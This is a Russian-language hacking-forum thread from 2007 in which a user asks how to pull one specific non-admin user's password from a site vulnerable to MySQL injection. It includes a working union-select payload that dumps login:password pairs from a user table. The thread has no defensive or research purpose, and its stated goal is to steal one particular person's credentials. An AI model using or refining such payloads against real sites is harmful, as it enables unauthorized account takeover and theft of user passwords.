ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL-inj,поиск по логину...
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

SQL-inj,поиск по логину...
  #1  
Старый 28.10.2007, 22:38
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
Question SQL-inj,поиск по логину...
Есть MySQL-inj , в базе дофигища юзеров а мне нужен пасс конкретно одного (не админа), как можно составить запрос чтоб выдало пасс конкретного юзера?...допустим
Код:
http://test.com/board/rept.php?id=-1+union+select+concat(login,0x3a,password),0,0,0+from+chat_users/*
Выдаст нейм:пасс, а как сделать чтоб конкретного юзера?
p.s. limit не предлагать))(Выдает только по одному)
 
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ